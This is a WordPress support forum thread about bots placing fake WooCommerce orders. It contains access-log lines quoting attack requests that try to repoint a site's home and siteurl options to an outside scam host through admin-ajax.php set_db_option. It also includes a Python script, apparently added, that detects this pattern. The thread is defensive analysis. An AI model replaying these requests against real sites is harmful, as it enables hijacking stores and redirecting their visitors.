• Resolved mywebmaestro

    (@mywebmaestro)


    This morning I had several clients report they’ve been seeing “failed orders” in their stores, where the payment failed and the info was obviously fake. (See below.) I haven’t found any reference to this online yet, but wanted to know if there’s a way to determine if this is a general software spam attack against woocommerce stores overall, or something specific to sites on my server. Has anyone else here seen this? Or is there some way I can determine more information and/or protect against it?

    Order info:
    bbbbb bbbbb
    bbbbb
    74 xxxxxxx Rd
    xxxxxxx
    EX14 5HN
    United Kingdom (UK)
    xxx xxxx xxxx
    [email protected] (another one used [email protected])

Viewing 15 replies - 106 through 120 (of 159 total)
  • Another thanks here @wigster

    @madjax

    can you point me as to where these logs would be?

    I’m also getting these types of orders.

    @wpstack92 that’s going to depend on your hosting setup.

    @bobwey1 what about you – do you have access logs from the server?

    Unfortunately both sites I’m troubleshooting are on a platform that disables access logs by default.

    Anonymous User 13665966

    (@anonymized-13665966)

    Here’s the deal with this bot attack, reading between the lines and using log files to help:

    1. The bot tries to exploit several vulnerabilities that have been out there in the wild and may affect specific plugins or versions of WordPress. This is clearly in an attempt to avoid using other means.

    2. It then grabs a copy of the homepage, parses it, and finds the first product ID it can get its hands on.

    3. It then goes to the cart, and then to the checkout.

    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:52 +0000] “POST /?add-to-cart=6748 HTTP/1.0” 302 0 “https://www.REDACTED.co.uk/?add-to-cart=6748” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:52 +0000] “GET /cart HTTP/1.0” 200 32314 “https://www.REDACTED.co.uk/?add-to-cart=6748” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:53 +0000] “POST /checkout HTTP/1.0” 200 35936 “https://www.REDACTED.co.uk/checkout” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”

    4. Now on the checkout, it’s likely making a note of the wp_woocommerce_session_XXXXX cookie value that gets generated in the browser; it can use this to continue the session in the next step.

    5. A custom HTTP script written in the Go language (popular with black and white/grey hat hackers) is then hitting the checkout; this is clear from the user-agent and the fact that there is no HTTP referrer, e.g.:

    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:56 +0000] “POST /checkout HTTP/1.0” 200 36638 “-” “Go-http-client/1.1”

    6. That script is creating the order, and is also likely to be exploiting whatever vulnerability is available to bypass customer account settings and create a new user; it may or may not be relying upon other exploits for this.

    7. Assuming it has successfully gained access to the system, it then tries to update the DB

    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:58 +0000] “POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=home&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n362 HTTP/1.0” 400 1 “https://www.REDACTED.co.uk/wp-admin/admin-ajax.php?action=set_db_option&option_name=home&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n362” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:26:59 +0000] “POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=siteurl&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n324 HTTP/1.0” 400 1 “https://www.REDACTED.co.uk/wp-admin/admin-ajax.php?action=set_db_option&option_name=siteurl&option_value=https://flat.lowerthenskyactive.ga/det.php?stem=n324” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”
    54.39.175.230 https://www.REDACTED.co.uk – [02/Nov/2020:09:27:00 +0000] “POST /wp-admin/profile.php?wc-ajax=1 HTTP/1.0” 500 178 “https://www.REDACTED.co.uk/wp-admin/profile.php?wc-ajax=1” “Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0”

    8. It either fails and leaves you with nuisance orders, or succeeds and points your site to the scam URL.
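    The sequence described in steps 2 to 8 can be pulled out of an access log mechanically. The script below is an added example, not code from the thread or from WooCommerce: it parses lines in the combined format quoted above (virtual host in the second field, referrer and user agent at the end) and in the plain common format some hosts write (no referrer/user agent), groups them per client IP, and flags the tell-tales the post points at: a POST to the checkout with a Go-http-client user agent, a checkout POST with no referrer, a checkout reached within seconds of the client's first request, and the admin-ajax.php set_db_option attempts against the home and siteurl options, from which it extracts the destination host as an indicator. The sample log, the hostnames, the 60-second threshold and the list of scripted user agents are all assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# Constructed sample in the shape of the log lines quoted in the thread.
# 54.39.175.230 mirrors the bot sequence (combined format with a vhost field),
# 82.78.27.18 mirrors the common-format lines (no referrer / user agent), and
# 203.0.113.7 is an invented ordinary shopper for comparison. Hostnames are made up.
SAMPLE_LOG = """\
54.39.175.230 https://www.shop.example - [02/Nov/2020:09:26:50 +0000] "GET / HTTP/1.0" 200 18200 "-" "Mozilla/5.0 (Windows NT 6.1; rv:81.0) Firefox/81.0"
54.39.175.230 https://www.shop.example - [02/Nov/2020:09:26:52 +0000] "POST /?add-to-cart=6748 HTTP/1.0" 302 0 "https://www.shop.example/?add-to-cart=6748" "Mozilla/5.0 (Windows NT 6.1; rv:81.0) Firefox/81.0"
54.39.175.230 https://www.shop.example - [02/Nov/2020:09:26:52 +0000] "GET /cart HTTP/1.0" 200 32314 "https://www.shop.example/?add-to-cart=6748" "Mozilla/5.0 (Windows NT 6.1; rv:81.0) Firefox/81.0"
54.39.175.230 https://www.shop.example - [02/Nov/2020:09:26:53 +0000] "POST /checkout HTTP/1.0" 200 35936 "https://www.shop.example/checkout" "Mozilla/5.0 (Windows NT 6.1; rv:81.0) Firefox/81.0"
54.39.175.230 https://www.shop.example - [02/Nov/2020:09:26:56 +0000] "POST /checkout HTTP/1.0" 200 36638 "-" "Go-http-client/1.1"
54.39.175.230 https://www.shop.example - [02/Nov/2020:09:26:58 +0000] "POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=home&option_value=https://evil.example/det.php?stem=n362 HTTP/1.0" 400 1 "https://www.shop.example/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; rv:81.0) Firefox/81.0"
54.39.175.230 https://www.shop.example - [02/Nov/2020:09:26:59 +0000] "POST /wp-admin/admin-ajax.php?action=set_db_option&option_name=siteurl&option_value=https://evil.example/det.php?stem=n324 HTTP/1.0" 400 1 "https://www.shop.example/wp-admin/admin-ajax.php" "Mozilla/5.0 (Windows NT 6.1; rv:81.0) Firefox/81.0"
82.78.27.18 - - [02/Nov/2020:08:01:29 +0000] "GET / HTTP/1.1" 200 11968
82.78.27.18 - - [02/Nov/2020:08:01:34 +0000] "GET /?token=9f5cd4863381fd7ff7973c33f7a556ea HTTP/1.1" 200 11967
82.78.27.18 - - [02/Nov/2020:08:02:03 +0000] "POST /checkout/ HTTP/1.1" 200 41612
203.0.113.7 https://www.shop.example - [02/Nov/2020:10:00:00 +0000] "GET /shop/ HTTP/1.1" 200 12096 "https://www.google.com/" "Mozilla/5.0 (Macintosh; rv:82.0) Firefox/82.0"
203.0.113.7 https://www.shop.example - [02/Nov/2020:10:03:41 +0000] "GET /cart/ HTTP/1.1" 200 30210 "https://www.shop.example/product/mug/" "Mozilla/5.0 (Macintosh; rv:82.0) Firefox/82.0"
203.0.113.7 https://www.shop.example - [02/Nov/2020:10:07:15 +0000] "POST /checkout/ HTTP/1.1" 200 41800 "https://www.shop.example/checkout/" "Mozilla/5.0 (Macintosh; rv:82.0) Firefox/82.0"
"""

# ip, two ignored fields (vhost/ident and user), timestamp, request line, status,
# bytes, then an optional referrer + user agent pair (absent in the common format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<ref>[^"]*)" "(?P<ua>[^"]*)")?$'
)

FAST_CHECKOUT_SECONDS = 60   # assumed: a person rarely goes from first hit to checkout this fast
SCRIPT_UA_PREFIXES = ("Go-http-client", "python-requests", "curl/")  # assumed list
TAMPER_OPTIONS = {"home", "siteurl"}   # the options targeted in the quoted admin-ajax requests


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlparse(rec["target"])
    rec["path"] = url.path.rstrip("/") or "/"   # treat /checkout and /checkout/ alike
    rec["query"] = parse_qs(url.query)
    return rec


def analyse(log_text):
    """Group lines per client IP and return {ip: {findings, iocs, requests}} for suspicious clients."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    report = {}
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        first_seen = recs[0]["ts"]
        findings, iocs = set(), set()
        for r in recs:
            if r["method"] == "POST" and r["path"].startswith("/checkout"):
                # Step 5: the order is submitted by a scripted client with no referrer.
                if r["ua"] is not None and r["ua"].startswith(SCRIPT_UA_PREFIXES):
                    findings.add("script_user_agent_checkout")
                if r["ref"] is not None and r["ref"] in ("", "-"):
                    findings.add("checkout_without_referrer")
                # Steps 2-3 compressed into a few seconds is not a human browsing session.
                if (r["ts"] - first_seen).total_seconds() < FAST_CHECKOUT_SECONDS:
                    findings.add("fast_checkout")
            # Step 7: attempt to repoint home/siteurl through admin-ajax.php.
            if r["path"] == "/wp-admin/admin-ajax.php" and r["query"].get("action") == ["set_db_option"]:
                if set(r["query"].get("option_name", [])) & TAMPER_OPTIONS:
                    findings.add("site_url_tamper_attempt")
                    for value in r["query"].get("option_value", []):
                        host = urlparse(value).hostname
                        if host:
                            iocs.add(host)   # the redirect destination the bot tried to install
        if findings:
            report[ip] = {"findings": sorted(findings), "iocs": sorted(iocs), "requests": len(recs)}
    return report


if __name__ == "__main__":
    for ip, info in analyse(SAMPLE_LOG).items():
        print(ip, info)
```

A 400 with a one-byte body on the set_db_option requests, as in the quoted lines, is what admin-ajax.php returns when no plugin has registered an action by that name, so those attempts found no handler on that site; the thing to verify after a run like this is that `home` and `siteurl` in the options table still hold your own domain, that no unexpected users with the Customer (or any other) role appeared at the timestamps flagged, and that the extracted host is added to your blocklist rather than visited.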

    @madjax

    that’s going to depend on your hosting setup.

    Kinsta…

    I already posted the access logs from a failed order

    @dmsims did your fake orders create customer user accounts?

    @madjax

    Yes accounts were created

    MV

    (@mvenkadesan)

    I also confirm that the fake orders created user accounts. I notice that new customers were created for any order, failed or successful. New users are created corresponding to these customers, with the role being set to Customer. Is that the same for others?

    @dmsims so this is every access log entry for this IP?

    82.78.27.18 – – [02/Nov/2020:08:01:29 +0000] “GET / HTTP/1.1” 200 11968
    82.78.27.18 – – [02/Nov/2020:08:01:32 +0000] “GET / HTTP/1.1” 200 11966
    82.78.27.18 – – [02/Nov/2020:08:01:34 +0000] “GET /?token=9f5cd4863381fd7ff7973c33f7a556ea HTTP/1.1” 200 11967
    82.78.27.18 – – [02/Nov/2020:08:02:03 +0000] “POST /checkout/ HTTP/1.1” 200 41612

    @mvenkadesan what are your user registration settings?

    WP Settings > General
    “Anyone can register” ?

    WooCommerce Settings > Accounts & Privacy
    “Allow customers to create an account during checkout” ?
    “Allow customers to create an account on the “My account” page” ?

    @madjax

    Yes they are all the entries for 82.78.27.18

    Here is another previous one:

    123.100.241.85 – – [27/Oct/2020:22:35:05 +0000] “POST / HTTP/1.1” 200 12763
    123.100.241.85 – – [27/Oct/2020:22:35:07 +0000] “POST / HTTP/1.1” 200 12762
    123.100.241.85 – – [27/Oct/2020:22:35:09 +0000] “POST /basket/ HTTP/1.1” 200 29451
    123.100.241.85 – – [27/Oct/2020:22:35:11 +0000] “POST /product-category/originals/ HTTP/1.1” 200 11724
    123.100.241.85 – – [27/Oct/2020:22:35:14 +0000] “POST /product-category/prints/ HTTP/1.1” 200 10092
    123.100.241.85 – – [27/Oct/2020:22:35:16 +0000] “POST /product-category/prints/medium-prints/ HTTP/1.1” 200 12265
    123.100.241.85 – – [27/Oct/2020:22:35:18 +0000] “POST /product-category/prints/small-prints/ HTTP/1.1” 200 11775
    123.100.241.85 – – [27/Oct/2020:22:35:20 +0000] “POST /product-category/ceramics/mugs/ HTTP/1.1” 200 11768
    123.100.241.85 – – [27/Oct/2020:22:35:22 +0000] “POST /product-category/greetings-cards/ HTTP/1.1” 200 10135
    123.100.241.85 – – [27/Oct/2020:22:35:24 +0000] “POST /product-category/greetings-cards/cards-for-all-occasions/ HTTP/1.1” 200 11684
    123.100.241.85 – – [27/Oct/2020:22:35:27 +0000] “POST /product-category/greetings-cards/christmas-cards/ HTTP/1.1” 200 11227
    123.100.241.85 – – [27/Oct/2020:22:35:28 +0000] “POST /product-category/tableware/ HTTP/1.1” 200 9889
    123.100.241.85 – – [27/Oct/2020:22:35:30 +0000] “POST /product-category/tableware/coasters/ HTTP/1.1” 200 10316
    123.100.241.85 – – [27/Oct/2020:22:35:32 +0000] “POST /product-category/tableware/placemats/ HTTP/1.1” 200 10375
    123.100.241.85 – – [27/Oct/2020:22:35:34 +0000] “POST /shop/ HTTP/1.1” 200 12096
    123.100.241.85 – – [27/Oct/2020:22:35:45 +0000] “POST /checkout/ HTTP/1.1” 200 42017

    MV

    (@mvenkadesan)

    @madjax :

    WP Settings > General
    “Anyone can register” ?

    Unchecked

    WooCommerce Settings > Accounts & Privacy
    “Allow customers to create an account during checkout” ?

    Checked

    “Allow customers to create an account on the “My account” page” ?

    Checked

  • The topic ‘Failed Orders – Fake Information’ is closed to new replies.